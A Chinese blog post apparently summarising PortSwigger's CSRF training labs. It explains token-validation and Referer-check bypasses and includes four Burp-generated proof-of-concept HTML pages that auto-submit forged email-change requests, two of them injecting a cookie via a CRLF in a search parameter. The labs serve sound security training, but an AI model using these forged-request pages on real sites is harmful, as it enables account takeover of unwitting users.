PortSwigger 跨站点请求伪造 (CSRF)

已于 2022-12-10 22:53:39 修改
阅读量631 收藏 3
点赞数 1
分类专栏: PortSwigger 靶场总结 文章标签: csrf 前端 网络安全 web安全
于 2022-12-10 19:47:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42451330/article/details/128268202
版权

一、什么是跨站点请求伪造 (CSRF)

        跨站点请求伪造(也称为 CSRF)是一个 Web 安全漏洞,允许攻击者诱使用户执行他们不打算执行的操作。

二、如何利用跨站点请求伪造 (CSRF)

        1、没有防御措施的 CSRF 漏洞

(1)在 Burp Suite 中选择要测试或利用的请求。
(2)从右键,选择参与工具 / 生成 CSRF PoC。

(3)Burp Suite 将生成一些 HTML 来触发选定的请求(减去 cookie,这将由受害者的浏览器自动添加)

(4)调整CSRF PoC生成器中的各种选项,以微调攻击的各个方面。

(5)将生成的 HTML 复制到网页中,当从受害者从浏览器中查看该地址,将成功发出并发生所需操作。

        2、通过修改请求方法绕过令牌验证

        应用程序在使用 POST 方法时正确验证令牌,但在使用 GET 方法时跳过验证。

        3、通过缺省令牌参数方式绕过令牌验证

        应用程序会在令牌存在时正确验证令牌,但如果省略令牌,则跳过验证。

        4、当令牌未绑定到用户会话,存在绕过

        应用程序不会验证令牌是否属于发出请求的用户所在的同一会话。相反,应用程序维护它已颁发的令牌的全局池,并接受此池中显示的任何令牌,可通过重新构造本地令牌进行绕过。

        5、当令牌绑定到非cookie会话,存在绕过

        应用程序确实将 CSRF 令牌绑定到 cookie,但不绑定到用于跟踪会话的同一 cookie。当应用程序使用两个不同的框架时,很容易发生这种情况,一个用于会话处理,一个用于CSRF保护。可通过设置cookie中CSRF进行绕过。

html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a400002040f5bb9c4cf54d8009d00e8.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="wiener&#64;normal&#45;user&#46;net" />
      <input type="hidden" name="csrf" value="rfr6gdaDlYL7yq40zCwxGp7hoVL7Ngxi" />
      <input type="submit" value="Submit request" />
    </form>
<img src="https://ac0e1f611fe5f5508015117d00d600e5.web-security-academy.net/?search=test;Set-Cookie: csrfKey=KX3SZtol2d02yBrBDzyI36Q8iu1ivajS;" onerror="document.forms[0].submit()">
  </body>
</html>

        6、当从 cookie 复制csfr令牌时,存在绕过

        应用程序不维护已颁发令牌的任何服务器端记录,而是在 cookie 和请求参数中复制每个令牌。验证后续请求时,应用程序只需验证在请求参数中提交的令牌是否与 Cookie 中提交的值匹配。这有时被称为针对 CSRF 的“双重提交”防御,提倡这样做是因为它易于实现并且不需要任何服务器端状态。

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0aed008b03104606c176817b00a90088.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="iener&#64;normal&#45;user&#46;net" />
      <input type="hidden" name="csrf" value="1234abcd" />
    </form>
    <img src="https://0aed008b03104606c176817b00a90088.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=1234abcd%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
  </body>
</html>

        7、通过更改referrer标头,进行绕过

        默认值: 一般浏览器的默认值是 no-referrer-when-downgrade
        no-referrer: 所有请求不发送 referrer
        no-referrer-when-downgrade: 当请求安全级别下降时不发送 referrer。目前,只有一种情况会发生安全级别下降,即从 HTTPS 到 HTTP。HTTPS 到 HTTP 的资源引用和链接跳转都不会发送 referrer。
        same-origin:对于同源的链接和引用,会发送referrer,其他的不会。
        origin:会发送 referrer,但只会发送源信息。源信息包括访问协议和域名。
        strict-origin:这个相当于 origin 和 no-referrer-when-downgrade 的 AND 合体。即在安全级别下降时不发送 referrer;安全级别未下降时发送源信息。
注意:这个是新加的标准,有些浏览器可能还不支持。
        origin-when-cross-origin:这个相当于 origin 和 same-origin 的 OR 合体。同源的链接和引用,会发送完全的 referrer 信息;但非同源链接和引用时,只发送源信息。
        strict-origin-when-cross-origin:这个比较复杂,同源的链接和引用,会发送 referrer。安全级别下降时不发送 referrer。其它情况下发送源信息。注意:这个是新加的标准,有些浏览器可能还不支持。        
        unsafe-url:无论是否发生协议降级,无论是本站链接还是站外链接,统统都发送 Referrer 信息。正如其名,这是最宽松而最不安全的策略。

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
<meta name="referrer" content="no-referrer">
  <script>history.pushState('', '', '/')</script>
    <form action="https://0ab00049036178f9c075a16100410058.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="ner&#64;normal&#45;user&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

        8、通过规避引用器的验证,进行绕过

        利用服务器标头设置:Referrer-Policy: unsafe-url  (无论是同源请求还是非同源请求,都发送完整的 URL(移除参数信息之后)作为引用地址。(最不安全的策略了))

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/0a06008503daaebbc0dd4d7500ab0047.web-security-academy.net')</script>
    <form action="https://0a06008503daaebbc0dd4d7500ab0047.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="ner&#64;normal&#45;user&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

战斗爽!战斗爽!战斗爽!战斗爽!战斗爽!
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
burpsuitezhengshu
02-04
burpsuite safty credenticate service,...................................................................................................
Glorp是HTTP拦截代理,允许检查和重播HTTP请求-Golang开发
05-26
Glorp是HTTP拦截代理,允许检查和重播HTTP请求。 设计布局和流程的功能类似于Portswigger的Burp Proxy和Repeater选项卡。 代理功能是使用Google的Martian完成的,UI是使用TView完成的。 GLORP Glorp是HTTP拦截代理,允许检查和重播HTTP请求。 设计布局和流程的功能类似于Portswigger的Burp Proxy和Repeater选项卡。 代理功能是使用Google的Martian完成的,UI是使用TView完成的。 这个想法是提供一个基于CLI的工具,用于当您想要看一下这个真实的东西而又不会使用Burp等启动另一个全脂容器/ vm /等等时。 安装可以使用git clone来完成安装,然后转到
http-request-smuggling:HTTP请求走私检测工具
05-04
HTTP请求走私检测工具 HTTP请求走私是一种高度严重的漏洞,该技术是攻击者通过模糊的HTTP请求走私以绕过安全控制并获得未经授权的访问权以执行恶意活动,该漏洞是在2005年由发现的,并于2019年8月重新发现。由发现,并在和,要了解有关此漏洞的更多信息,可以在查阅其文献充分的研究博客。 因此,此安全工具背后的想法是针对给定主机检测HRS漏洞,并根据具有给定排列的时间延迟技术进行检测,因此,要进一步了解此工具,我强烈建议您阅读有关以下内容的文章:这个工具。 技术概述 该工具是使用python编写的,要使用此工具,您必须在本地计算机上安装python 3.x版本。 它采用您需要在文本文件中提供的一个URL或URL列表的输入,并且通过遵循HRS漏洞检测技术,该工具具有内置的有效负载,该负载具有大约37个排列的CL.TE和TE.CL及其对于每个给定的主机,将使用这些有效负载来生成攻击请求对象,
buby:PortSwigger Burp Suite 的 BurpExtender 接口的 JRuby 实现
06-08
buby by Eric Monti, Timur Duehr http://tduehr.github.com/buby 注: 本文档适用于 Buby 的旧 gem 版本。 它不适用于 BurpSuite 的当前版本。 对于 Burp 1.5.01 及更高版本,请使用 Buby 的 BApp 版本。 此文档将在下一个版本中更新。 说明: Buby 是 JRuby 与 PortSwigger 流行的商业 Web 安全测试工具 Burp Suite 的混搭。 Burp 由使用 BurpExtender API 的 Java 扩展或使用新的嵌入式 JRuby 支持的 JRuby BurpExtender 实现驱动并绑定到 JRuby。 该扩展旨在为 Burp Suite 添加 Ruby 脚本能力,其界面可与 Burp 的纯 Java 扩展界面相媲美。 这个扩展最适合 Burp S
portswigger证书
11-19
portswigger证书,der格式、pem格式,转化好的,直接可以用哦! Android设备抓包必备哦!
PortSwigger靶场CSRF最新版详细通关记录
LawnCat的博客
02-16 1376
该文章为portswiggerCSRF中绕过token篇。
portswigger_CSRF
(∪.∪ )...zzz的博客
05-18 529
这里写自定义目录标题一、cross-site request forgery1. 影响2. CSRF工作3. 构造CSRF 一、cross-site request forgery CSRF 1. 影响 更改用户信息 资金转移等 2. CSRF工作 用户处理特权相关的工作; 更改信息,权限 是基于cookie的会话,仅依靠cookie来确定是用户提出的,没其他验证比如token、refer 3. 构造CSRF ...
【burpsuite安全练兵场-客户端12】站点请求伪造CSRF-12个实验(全)
热门推荐
01-15 1万+
【BP靶场portswigger-客户端12-站点请求伪造CSRF】12个实验-万文详细步骤
JWT 攻击 | PortSwigger(burpsuite官方靶场)| Part 1
bin789456的博客
10-05 4158
是token的一种实现,全称为。以形式来说,它就是一个字符串,将用户的信息保存在一个json字符串中,编码后得到的一个token,这个token有签名功能防篡改认证流程:post提交表单后,后端验证完成生成一个jwt,接下来返回该jwt至客户端,随后请求中带上该jwt,即可工作。传统cookie、session对比:1、JWT数据量小,传输速度快2、由于是json,JWT是语言的,应用广3、更适用于移动端,因为它们不支持cookie4、避免csrf,因为不依赖cookie。
PortSwigger Academy | Cross-site request forgery (CSRF) : 请求伪造
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
02-02 1043
文章目录什么是CSRFCSRF攻击有什么影响?CSRF如何工作?使用SameSite Cookie防御CSRF如何构造CSRF攻击Lab: CSRF vulnerability with no defenses如何进行CSRF攻击XSS vs CSRFXSS和CSRF有什么区别?CSRF令牌可以阻止XSS攻击吗?防止CSRF攻击CSRF token什么是CSRF令牌?CSRF令牌应如何生成?CSRF令牌应如何传输?CSRF令牌应如何验证?常见的CSRF漏洞CSRF令牌的验证取决于请求方法Lab: CSRF
CSRF请求伪造,含使用教程和测试工具
05-04
CSRF请求伪造,使用OWASP CSRFTester工具可以抓取并伪造请求,其测试原理是,使用代理抓取我们在浏览器中访问过的所有的连接以及所有的表单等信息,通过在CSRFTester中修改相应的表单等信息,重新提交,相当于一次伪造客户端请求,如果修改测试的请求成功被网站服务器接受,则说明存在CSRF漏洞。
portswigger CSRF vulnerability with no defenses(lab1)
weixin_51559599的博客
11-13 51
用户访问恶意网站执行更改邮箱的指令。
PortSwigger(八)站脚本XSS漏洞
weixin_52835927的博客
11-06 183
/script>单击“存储”和“向受害者提供漏洞”。此注入创建一个带有 ID 的自定义标签,其中包含触发函数的事件处理程序。URL 末尾的哈希值在页面加载后立即聚焦于此元素,从而导致调用有效负载。
实战演练:利用XSS漏洞执行CSRF攻击
最新发布
网络安全
01-15 487
该实验室在博客评论功能中包含存储的XSS漏洞。要解决实验室问题,可利用该漏洞执行CSRF攻击,并更改查看博客帖子评论的人的电子邮件地址。实验入口:进入网站,点击【ACCESS THE LAB】即可进入实验环境。
利用burp suite进行CSRF重放攻击
vaeloverforever的博客
12-16 4129
在windows xp系统中配置Damn Vulnerable Web Application (DVWA),借此安装一个web服务器,这个应用程序有若干基于web的漏洞,比如站脚本 (XSS), SQL注入, CSRF,命令注入等。 安装步骤 Step 1: 下载并安装XAMPP Step 2: 打开XAMPP Control Panel,开启Apache和MySQL服务 点击”S...
CSRF的攻防
公众号shadow sock7
12-31 261
https://portswigger.net/web-security/csrf CSRF存在的情况: 存在一个关键动作(转账、改密码、改邮箱等敏感的增删改查操作) 应用对用户鉴权身份认证是基于session cookie的(浏览器会自动将相应域的cookie带上去访问相关请求,如果是特定请求头比如HTTP basic认证或者特殊token请求头认证,则浏览器不会自动带上) 攻击者可以知道完成...
csrf漏洞小结
qq_45091741的博客
05-04 227
趁着距离还有一段时间 在burp安全学院学习了波web csrf漏洞,漏洞成因那些网上文章那么多,我就不详写了,这篇文章主要写怎么测试csrf漏洞 burp安全学院csrf文章及实验场景 https://portswigger.net/web-security/csrf 以后遇到可能存在csrf的表单提交二话不说按照以下方法先测试提交一波 1,更改请求方式 2,删除token 3,令牌未绑定用户会...
带你刷burpsuite官方网络安全学院靶场(练兵场)之客户端漏洞——请求伪造(CSRF)专题
HBohan的博客
08-05 1724
介绍 PortSwigger是信息安全从业者必备工具burpsuite的发行商,作为网络空间安全的领导者,他们为信息安全初学者提供了一个在线的网络安全学院(也称练兵场),在讲解相关漏洞的同时还配套了相关的在线靶场供初学者练习,本系列旨在以梨子这个初学者视角出发对学习该学院内容及靶场练习进行全程记录并为其他初学者提供学习参考,希望能对初学者们有所帮助。 什么是CSRFCSRF全称为cross-site request forgery,译为请求伪造。有的站点会采用同源策略,如果想要利用受害者身份去执
渗透测试 ( 0 ) --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
freeking101的博客
06-12 3424
渗透测试 --- http协议、XSS、CSRF、文件上传、文件包含、反序列化漏洞
portswigger Authentication
07-28
PortSwigger是一家网络安全公司,他们开发了一款名为Burp Suite的强大的网络安全测试工具。在Burp Suite中,有一个功能模块是用于进行身份验证测试的,即Authentication模块。这个模块可以帮助安全专业人员测试应用程序的身份验证机制的安全性。在进行身份验证测试时,可能会涉及到JSON Web Token(JWT)的使用。JWT是一种用于在网络应用之间传递信息的安全方式。然而,JWT也存在一些安全漏洞,其中一些与身份验证相关。引用\[1\]提到了一些JWT的实现缺陷,如没有正确验证签名、服务器密钥泄露等问题。引用\[2\]提到了一些可能存在的攻击,如注入自签名证书和JWT算法混乱。引用\[3\]提到了一些签名算法的安全性问题。在进行PortSwigger的Authentication模块测试时,可以关注这些JWT相关的安全问题,以帮助发现和修复应用程序中的身份验证漏洞。 #### 引用[.reference_title] - *1* *2* *3* [portswigger JWT attacks](https://blog.csdn.net/weixin_63231007/article/details/127684964)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值